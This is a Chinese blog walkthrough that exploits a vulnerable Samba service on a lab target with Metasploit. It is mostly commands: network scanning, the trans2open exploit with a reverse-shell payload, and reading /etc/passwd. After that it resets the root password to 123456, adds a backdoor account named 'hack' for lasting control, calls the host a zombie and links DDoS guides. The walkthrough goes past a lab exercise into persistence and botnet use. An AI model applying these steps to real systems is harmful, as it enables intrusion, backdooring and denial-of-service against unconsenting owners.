基于Metasploit完成Samba服务漏洞复现

简介: 基于Metasploit完成Samba服务漏洞复现

实验环境:


靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)


攻击机ip:192.168.31.166(X64)


一:主机发现


arp-scan -l      #扫描同一网段下的主机


579ceced28d84aebb8ddb43b9e7f9b59.png


可以看到靶机的IP地址和mac地址,Vmware为虚拟机


ecde8f9fe2054795ac0d7ccd348b0a0b.png


2.漏洞扫描

nmap  192.168.31.182  -p- -sV -sS -T4 -A         #扫描开放的端口和服务                                          


可以看到存在samba服务漏洞7f65cddde4d94f4aa2c7d45507d9f4e6.png

靶机的操作系统为linux 2.4.X,属于较低版本

58575eb8823740a38312c53ac459c1fd.png

确定Samba服务的版本号

msfconsole  
search smb_version
use auxiliary/scanner/smb/smb_version 
show options
set rhosts 192.168.31.182
run

7823c71cefcc4cf8b3a1e0e84484d5bf.png

3.漏洞利用

search samba 2.2
exploit/linux/samba/trans2open       #   或者use2
show options 
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555       #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run

e70b969892ee49e98614efb1bd8dbf25.png


注意:如果出下面这种情况,更换本地监听主机的端口号


[-] Handler failed to bind to 192.168.31.166:4444:-  -

[-] Handler failed to bind to 0.0.0.0:4444:-  -

[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).


78002130e763411fb01203fc38d08a3e.png


4.攻击成功

id
cat /etc/passwd

出现下面的截图说明靶机攻击成功,接下来就是植入后门账号


7f31fc5851a64fe7a1f236b213d072de.png


可以看到 拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡


passwd root     #修改root账号的密码,进行ssh登录
123456
123456          #重复输入两次密码


505e3731d14946458d9f96d5e542f869.png

5.远程连接靶机


1.问题复现


使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错

ssh root@192.168.31.182                                                  255 ⨯

ssh root@192.168.31.182                                                  255 ⨯

Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1


无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。 他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1  


2.报错截图


ed8e3069ff284237a47c7a9921328241.png


3.问题解决


ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182


root为登录的用户名,192,。168.31.182为靶机ip地址


成功登录靶机

5e96348066184081968b3162a64e7ef6.png


6.在靶机中增加账号

useradd hack
passwd 
123456
123456

8554fafad6924685a4804a4079806c72.png

cat /etc/passwd

3fc2baabf8444c739dc3b6c162813345.png

可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机


ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-


3be0d4e26d8f425882e5edda2b6f590d.png


7.利用肉鸡执行ddos攻击


附大佬博客


如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)

https://cloud.tencent.com/developer/article/1199800


(63条消息) 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)_Firebasky的博客-CSDN博客_kali攻击路由器瘫痪

https://blog.csdn.net/qq_46091464/article/details/105857350


相关文章
|
6月前
|
安全 Shell
Metasploit系列(二) -- 漏洞利用
Metasploit系列(二) -- 漏洞利用
63 0
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1807 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
1月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
|
5月前
|
运维 监控 安全
JumpServer RCE复现
JumpServer RCE复现
105 1
|
安全 测试技术 网络安全
如何使用Metasploit进行漏洞利用?
如何使用Metasploit进行漏洞利用?
195 0
|
安全 Windows
Windows2003系统漏洞提权复现
操作系统: Microsoft Windows Server 2003 Web服务器: IIS V6.0 第一步,将大马文件上传至服务器根目录
554 0
Windows2003系统漏洞提权复现
|
安全 Shell 数据安全/隐私保护
CVE-2019-15107 Webmin RCE漏洞复现
环境搭建: 进入镜像目录
356 0
|
存储 安全 Ubuntu
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
246 0
|
安全 关系型数据库 MySQL
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
|
安全 Linux 网络安全
Linux脏牛漏洞提权复现
操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache
591 0
Linux脏牛漏洞提权复现